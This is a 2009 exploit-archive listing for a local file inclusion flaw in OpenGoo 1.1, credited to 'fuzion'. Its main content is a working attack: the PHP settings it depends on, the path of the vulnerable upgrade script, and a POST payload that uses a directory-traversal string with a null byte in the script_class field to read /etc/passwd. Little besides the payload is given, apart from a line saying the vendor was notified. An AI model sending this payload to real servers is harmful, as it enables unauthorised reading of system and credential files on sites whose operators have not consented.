[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OpenGoo 1.1 (script_class) Local File Inclusion Vulnerability
# Published : 2009-01-25
# Author : fuzion
# Previous Title : Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability
# Next Title : EPOLL SYSTEM 3.1 (password.dat) Disclosure Exploit
OpenGoo 1.1 Local File Inclusion
http://www.opengoo.org/
magic_quotes_gpc = Off
register_globals = On
http://site/opengoo/public/upgrade/index.php
POST: form_data[script_class]=/../../../../../../../../../../../etc/passwd%00.html
Author Notified: Jan. 18
http://nukeit.org
# www.Syue.com [2009-01-25]